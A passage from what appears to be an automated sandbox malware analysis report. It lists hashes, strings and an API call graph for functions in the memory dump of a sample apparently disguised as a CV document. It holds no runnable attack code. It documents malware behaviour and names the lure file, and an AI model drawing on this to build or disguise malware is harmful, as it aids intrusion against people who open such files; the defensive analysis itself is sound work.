                                                                                                  • Opcode Fuzzy Hash: 851a9d0b09388a0b1ff9169cdf6880c5537cef7c622464686959281ab6997380
                                                                                                  • Instruction Fuzzy Hash: B890023121100802EA807158450464A000587D3341FD1C469A0019654ECE268A5A77B1
                                                                                                  Function 00F82B00 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 99b4c2fa71f550c9de830c5f109a0d0e6749c2d4a6d4bc0585174e8f7ee7c19f
                                                                                                  • Instruction ID: 38acdbdd1a8cdd36280269924f11d4f0e907a1fbb6a8b51cecf4a1715daed768
                                                                                                  • Opcode Fuzzy Hash: 99b4c2fa71f550c9de830c5f109a0d0e6749c2d4a6d4bc0585174e8f7ee7c19f
                                                                                                  • Instruction Fuzzy Hash: 0590023121504842EA4071584504A46001587D2345F91C465A0058694EDA368D56B671
                                                                                                  Function 00F82CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 13037d5f9bd7b2df0925572c1046772a50155bc35cecc3fe1b2c44a9575d701d
                                                                                                  • Instruction ID: 49c928a65dbfa384e9d2aafb2ff2457c388757a1e6db7b95d8258aacf70ee48c
                                                                                                  • Opcode Fuzzy Hash: 13037d5f9bd7b2df0925572c1046772a50155bc35cecc3fe1b2c44a9575d701d
                                                                                                  • Instruction Fuzzy Hash: EE900221252041526E45B1584504507400697E23817D1C466A1408950DC9379857F631
                                                                                                  Function 00F82CD0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 67c9cededbc343028e44494a840f525af14cb86033720b6fb78e179e8b45c554
                                                                                                  • Instruction ID: 88dcc0c75e1920849f29a2c88c456e5547a4fe460f52baedc93c9772e53795f3
                                                                                                  • Opcode Fuzzy Hash: 67c9cededbc343028e44494a840f525af14cb86033720b6fb78e179e8b45c554
                                                                                                  • Instruction Fuzzy Hash: 0690023125100402EA4171584504606000997D2381FD1C466A0418554FCA668A57BA71
                                                                                                  Function 00F82C50 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4e202857c94320afaae54d2040d2a2fefc910059be53321561ba4bdb6997a7ac
                                                                                                  • Instruction ID: b234a08fbd5ac5cd3f0ea2fef68930ae5212f1d050d06fe1dda80297eb392123
                                                                                                  • Opcode Fuzzy Hash: 4e202857c94320afaae54d2040d2a2fefc910059be53321561ba4bdb6997a7ac
                                                                                                  • Instruction Fuzzy Hash: 2F90022131100003EA40715855186064005D7E3341F91D465E0408554DDD2688577232
                                                                                                  Function 00F82C30 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4abf6474cba5d0b731f85b5c51cd58b9d7a3717dc1a7d6acba51b634dd2b76da
                                                                                                  • Instruction ID: c72a73ebcaffdc6a1860a126d9d603aa1ad8114b6abbec54eff93f038c48b633
                                                                                                  • Opcode Fuzzy Hash: 4abf6474cba5d0b731f85b5c51cd58b9d7a3717dc1a7d6acba51b634dd2b76da
                                                                                                  • Instruction Fuzzy Hash: 7C90022922300002EA807158550860A000587D3342FD1D869A0009558DCD26886A7331
                                                                                                  Function 00F82C20 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ee6e0f398b013d5d0ce2893c04c06999a42336e9d5cf324e802f847d59105be1
                                                                                                  • Instruction ID: 912a2cff518b80fcb1568e18b295f58f141e982617d4c5660d6f7ac7d31bdea3
                                                                                                  • Opcode Fuzzy Hash: ee6e0f398b013d5d0ce2893c04c06999a42336e9d5cf324e802f847d59105be1
                                                                                                  • Instruction Fuzzy Hash: AD90022121504442EA0065585508A06000587D2345F91D465A1058595ECA368852B131
                                                                                                  Function 00F82C10 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b0a6e7dab362af23fea36a7f2b0086e7e1db39ae948b40309ebeaec74a7624d5
                                                                                                  • Instruction ID: bd7ccf96f712029c45b63e007a6cc35a71f122af541df245033124e057e5d0d3
                                                                                                  • Opcode Fuzzy Hash: b0a6e7dab362af23fea36a7f2b0086e7e1db39ae948b40309ebeaec74a7624d5
                                                                                                  • Instruction Fuzzy Hash: B690023121100403EA0061585608707000587D2341F91D865A0418558EDA6788527131
                                                                                                  Function 00F82DC0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 21cfb6261ca7da6ed8ff3a691bfc07728502230e4037d6d42c5364735c2b4b70
                                                                                                  • Instruction ID: 31832980127e45d61ec4be7aa6b16016f2d9b29d816fe90f79830ecff7ee8e67
                                                                                                  • Opcode Fuzzy Hash: 21cfb6261ca7da6ed8ff3a691bfc07728502230e4037d6d42c5364735c2b4b70
                                                                                                  • Instruction Fuzzy Hash: DE90027121100402EA4071584504746000587D2341F91C465A5058554FCA6A8DD67675
                                                                                                  Function 00F82DA0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8a9b2861966a15eb958bca75d4bfd225bb0bbe3c63ec6f790213d4fe4b96e5fc
                                                                                                  • Instruction ID: 822032c72a326528d3f0e783cc55c577f604a59d6d471909b5a4f7e509a48a0a
                                                                                                  • Opcode Fuzzy Hash: 8a9b2861966a15eb958bca75d4bfd225bb0bbe3c63ec6f790213d4fe4b96e5fc
                                                                                                  • Instruction Fuzzy Hash: 1190022161100502EA0171584504616000A87D2381FD1C476A1018555FCE368993B131
                                                                                                  Function 00F82D50 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b871ff3493867f339d83fcf6185366d02a38aa0560d4f508405e8aab9298813f
                                                                                                  • Instruction ID: 0076d3a66b27dd578bccf74df3407dc77f9f1aa388114406b46f36a86cd6b1ec
                                                                                                  • Opcode Fuzzy Hash: b871ff3493867f339d83fcf6185366d02a38aa0560d4f508405e8aab9298813f
                                                                                                  • Instruction Fuzzy Hash: 1C90022131100402EA02615845146060009C7D3385FD1C466E1418555ECA368953B132
                                                                                                  Function 00F82ED0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 50f5c59a4f26549ca121211ae8e3871daccd6d90ec5949c564f5c853948091a1
                                                                                                  • Instruction ID: 7432329557aa367a75b1e24db1cd93e56a8d8e031e88fd1e40915d6ae9264ee2
                                                                                                  • Opcode Fuzzy Hash: 50f5c59a4f26549ca121211ae8e3871daccd6d90ec5949c564f5c853948091a1
                                                                                                  • Instruction Fuzzy Hash: B6900221611000425A40716889449064005ABE3351791C575A098C550EC96A88667675
                                                                                                  Function 00F82EC0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 44a36cc4f0b39e6ad65216940692e3f3fe952c6b6a037d1b67947aba3cc9b101
                                                                                                  • Instruction ID: 8d4a4f624e9d6d3c4e440b4299187b3ab444d5030c978e38bce65436db8430c5
                                                                                                  • Opcode Fuzzy Hash: 44a36cc4f0b39e6ad65216940692e3f3fe952c6b6a037d1b67947aba3cc9b101
                                                                                                  • Instruction Fuzzy Hash: 7890023121140402EA0061584908747000587D2342F91C465A5158555FCA76C8927531
                                                                                                  Function 00F82EB0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dd10970de3e06cf52dd21cd4462c147bcb50fddb06c1ac43dc5847a8295ec88c
                                                                                                  • Instruction ID: 54d3058c1bf653714e685b85b1a24a779060a53b552f7ac406e3d2b4d903ad9a
                                                                                                  • Opcode Fuzzy Hash: dd10970de3e06cf52dd21cd4462c147bcb50fddb06c1ac43dc5847a8295ec88c
                                                                                                  • Instruction Fuzzy Hash: E190023121140402EA006158491470B000587D2342F91C465A1158555ECA3688527571
                                                                                                  Function 00F82E80 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 82372cb6f0a97197022220eb8508f66b794b874da3873bf627f602cdce9246b5
                                                                                                  • Instruction ID: ff4144c839aead76f7f902137d3a11fdffbbaab644178a42903be35084d7be82
                                                                                                  • Opcode Fuzzy Hash: 82372cb6f0a97197022220eb8508f66b794b874da3873bf627f602cdce9246b5
                                                                                                  • Instruction Fuzzy Hash: 2C90026122100042EA0461584504706004587E3341F91C466A2148554DC93A8C627135
                                                                                                  Function 00F82E50 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b707063f1310b843217404cb9e40d1593911dc9ebe3d7f9a02050cecc29a2dae
                                                                                                  • Instruction ID: 596bfb68f7b80cefdfe7b6e6b90cbbfedc95ffee8f00fe987dbe5b7a88c0fcac
                                                                                                  • Opcode Fuzzy Hash: b707063f1310b843217404cb9e40d1593911dc9ebe3d7f9a02050cecc29a2dae
                                                                                                  • Instruction Fuzzy Hash: 3790026135100442EA0061584514B060005C7E3341F91C469E1058554ECA2ACC537136
                                                                                                  Function 00F82E00 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dc1770da7ea0ee5a2a1cdf4e0cacab69775dfdd72e1cf1bcf52aaeaff785f366
                                                                                                  • Instruction ID: b204a7c9781da9d654d9a55e8081bb49dfb6d1fc5c27fd4077607bb0eb6cf41d
                                                                                                  • Opcode Fuzzy Hash: dc1770da7ea0ee5a2a1cdf4e0cacab69775dfdd72e1cf1bcf52aaeaff785f366
                                                                                                  • Instruction Fuzzy Hash: 7C90026121140403EA4065584904607000587D2342F91C465A2058555FCE3A8C527135
                                                                                                  Function 00F82FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8ecc3fb07ad44dab34b9313376ae491045cf69f918225503d720feea9388b5e3
                                                                                                  • Instruction ID: ef51a385270ee606b7886511f2cb1850bfdc0781cbb40b68468f58138a38ce36
                                                                                                  • Opcode Fuzzy Hash: 8ecc3fb07ad44dab34b9313376ae491045cf69f918225503d720feea9388b5e3
                                                                                                  • Instruction Fuzzy Hash: DC90022125100802EA40715885147070006C7D2741F91C465A0018554ECA27896676B1
                                                                                                  Function 00F82F30 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 49fc910bbbf6425e9c75f99977ce43fe5fe6d4668b68cfbb70b9a0e8b20163b7
                                                                                                  • Instruction ID: 9e22747dbbe9bbc21a70149afb0085bd248c91f6f710b9d18cb85b402577bf0b
                                                                                                  • Opcode Fuzzy Hash: 49fc910bbbf6425e9c75f99977ce43fe5fe6d4668b68cfbb70b9a0e8b20163b7
                                                                                                  • Instruction Fuzzy Hash: 9190022121144442EA4062584904B0F410587E3342FD1C46DA414A554DCD2688567731
                                                                                                  Function 00F82F00 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 07c65a24e86b7a2a10604b18f9d4b2a068fea720f985e42c4bfb41f81bc43372
                                                                                                  • Instruction ID: 91fd390b63f6eaacb8a702999ea77835cdfbc1c60054a8eb72b09ca43c5c20e3
                                                                                                  • Opcode Fuzzy Hash: 07c65a24e86b7a2a10604b18f9d4b2a068fea720f985e42c4bfb41f81bc43372
                                                                                                  • Instruction Fuzzy Hash: 3890022122180042EB0065684D14B07000587D2343F91C569A0148554DCD2688627531
                                                                                                  Function 00F838D0 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4e0cf3e5cf859019ac6ec0ba7c1997d53d70bb421bf74a666a7baeddf843fd11
                                                                                                  • Instruction ID: 19b64e514c5ef4e077496cda2512402caf1a1731c8c6c003367b9829fb10eb86
                                                                                                  • Opcode Fuzzy Hash: 4e0cf3e5cf859019ac6ec0ba7c1997d53d70bb421bf74a666a7baeddf843fd11
                                                                                                  • Instruction Fuzzy Hash: 4890022125505102EA50715C45046164005A7E2341F91C475A0808594EC96688567231
                                                                                                  Function 00F83C90 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3e442b77793e2f3348072b066e1f2177484894ea668c50fa8e891d46df5edff8
                                                                                                  • Instruction ID: 295eef1ae1a52f1bd2c1c040d1fd7fe45bb40ded1cb9f132f7dacebf5c5fba34
                                                                                                  • Opcode Fuzzy Hash: 3e442b77793e2f3348072b066e1f2177484894ea668c50fa8e891d46df5edff8
                                                                                                  • Instruction Fuzzy Hash: AC90023521100402EE1061585904646004687D2341F91D865A0418558ECA6588A2B131
                                                                                                  Function 00F83C30 Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 22f3b59f704d842cc23e55c08f3b8620079b7dd876bb518a7cf962d6dcc0014f
                                                                                                  • Instruction ID: 699c59891db6b5643899a754a564b36c9c229338d4b89f122afdb1ba4b643331
                                                                                                  • Opcode Fuzzy Hash: 22f3b59f704d842cc23e55c08f3b8620079b7dd876bb518a7cf962d6dcc0014f
                                                                                                  • Instruction Fuzzy Hash: FC90023121200142AE4062585904A4E410587E3342BD1D869A0009554DCD2588627231
                                                                                                  Function 00F82B20 Relevance: .0, Instructions: 2COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                  • Instruction ID: 25a299f01f2532d6133b7acd7e0e834de0be6ad5d30a8a2532bc5f3828193302
                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                  • Instruction Fuzzy Hash:
                                                                                                  Function 00F77550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00FB4507
                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00FB4530
                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 00FB4592
                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00FB4460
                                                                                                  • ExecuteOptions, xrefs: 00FB44AB
                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00FB454D
                                                                                                  • Execute=1, xrefs: 00FB451E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                  • API String ID: 0-484625025
                                                                                                  • Opcode ID: 2e7b51856cea9e48c1b43545aea42c66dd8ec801a074b03d4e31069ce96e42c1
                                                                                                  • Instruction ID: 79e548248b9a0fd3e77bd89ecb6440139a0c167f309f07f1ccca17cc2d7d8b82
                                                                                                  • Opcode Fuzzy Hash: 2e7b51856cea9e48c1b43545aea42c66dd8ec801a074b03d4e31069ce96e42c1
                                                                                                  • Instruction Fuzzy Hash: EB513B31A043196ADF20BB94ED46FED73A8EF14310F0844AAE509A7181E774EE41FF56
                                                                                                  Function 00F49046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $$@
                                                                                                  • API String ID: 0-1194432280
                                                                                                  • Opcode ID: f2d2b052a1d133032c0b59281289c690dcdf8bce68a8d9c8f1b97d3286ff139c
                                                                                                  • Instruction ID: ade55dfc31b74e265f1509a6127c2cf25134f9eddb550577578cd8ecb7c972ca
                                                                                                  • Opcode Fuzzy Hash: f2d2b052a1d133032c0b59281289c690dcdf8bce68a8d9c8f1b97d3286ff139c
                                                                                                  • Instruction Fuzzy Hash: 2C813FB1E042699BDB31CF54CC45BDEB6B8AF49710F0041DAE909B7281E7745E84DF60

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2.6%
                                                                                                  Dynamic/Decrypted Code Coverage:4.2%
                                                                                                  Signature Coverage:1.6%
                                                                                                  Total number of Nodes:451
                                                                                                  Total number of Limit Nodes:73
                                                                                                  execution_graph 93630 2c68844 93632 2c68804 93630->93632 93631 2c68871 93632->93630 93632->93631 93634 2c67110 93632->93634 93635 2c67126 93634->93635 93637 2c6715c 93634->93637 93635->93637 93638 2c66f80 LdrLoadDll 93635->93638 93637->93632 93638->93637 93639 2c62840 93640 2c62865 93639->93640 93645 2c645d0 93640->93645 93642 2c62898 93644 2c628b7 93642->93644 93650 2c66330 93642->93650 93647 2c645f4 93645->93647 93646 2c645fb 93646->93642 93647->93646 93648 2c64647 93647->93648 93649 2c64630 LdrLoadDll 93647->93649 93648->93642 93649->93648 93651 2c66363 93650->93651 93652 2c66387 93651->93652 93657 2c78eb0 93651->93657 93652->93644 93654 2c663aa 93654->93652 93661 2c79340 93654->93661 93656 2c6642a 93656->93644 93658 2c78ecd 93657->93658 93664 34b2bc0 LdrInitializeThunk 93658->93664 93659 2c78ef9 93659->93654 93662 2c7935a 93661->93662 93663 2c7936b NtClose 93662->93663 93663->93656 93664->93659 93665 2c69c40 93666 2c69c4f 93665->93666 93667 2c69c56 93666->93667 93669 2c7b3d0 93666->93669 93672 2c796b0 93669->93672 93671 2c7b3e9 93671->93667 93673 2c796ca 93672->93673 93674 2c796db RtlFreeHeap 93673->93674 93674->93671 93675 2c66e00 93676 2c66e27 93675->93676 93679 2c67f70 93676->93679 93678 2c66e51 93680 2c67f8d 93679->93680 93686 2c78a80 93680->93686 93682 2c67fe4 93682->93678 93683 2c67fdd 93683->93682 93691 2c78b60 93683->93691 93685 2c6800d 93685->93678 93687 2c78b1b 93686->93687 93688 2c78aab 93686->93688 93696 34b2e50 LdrInitializeThunk 93687->93696 93688->93683 93689 2c78b54 93689->93683 93692 2c78b8f 93691->93692 93693 2c78c11 93691->93693 93692->93685 93697 34b2c30 LdrInitializeThunk 93693->93697 93694 2c78c56 93694->93685 93696->93689 93697->93694 93698 2c63100 93699 2c6311b 93698->93699 93703 2c6322f 93699->93703 93704 2c67dc0 93699->93704 93702 2c79340 NtClose 93702->93703 93705 2c67dda 93704->93705 93709 2c63213 93704->93709 93710 2c78a30 93705->93710 93708 2c79340 NtClose 93708->93709 93709->93702 93709->93703 93711 2c78a4d 93710->93711 93714 34b34e0 LdrInitializeThunk 93711->93714 93712 2c67eaa 93712->93708 93714->93712 93715 2c76040 93716 2c7609a 93715->93716 93718 2c760a7 93716->93718 93719 2c73a70 93716->93719 93726 2c7b340 93719->93726 93721 2c73ab1 93722 2c645d0 LdrLoadDll 93721->93722 93724 2c73bb0 93721->93724 93725 2c73af1 93722->93725 93723 2c73b32 Sleep 93723->93725 93724->93718 93725->93723 93725->93724 93729 2c794b0 93726->93729 93728 2c7b371 93728->93721 93730 2c79545 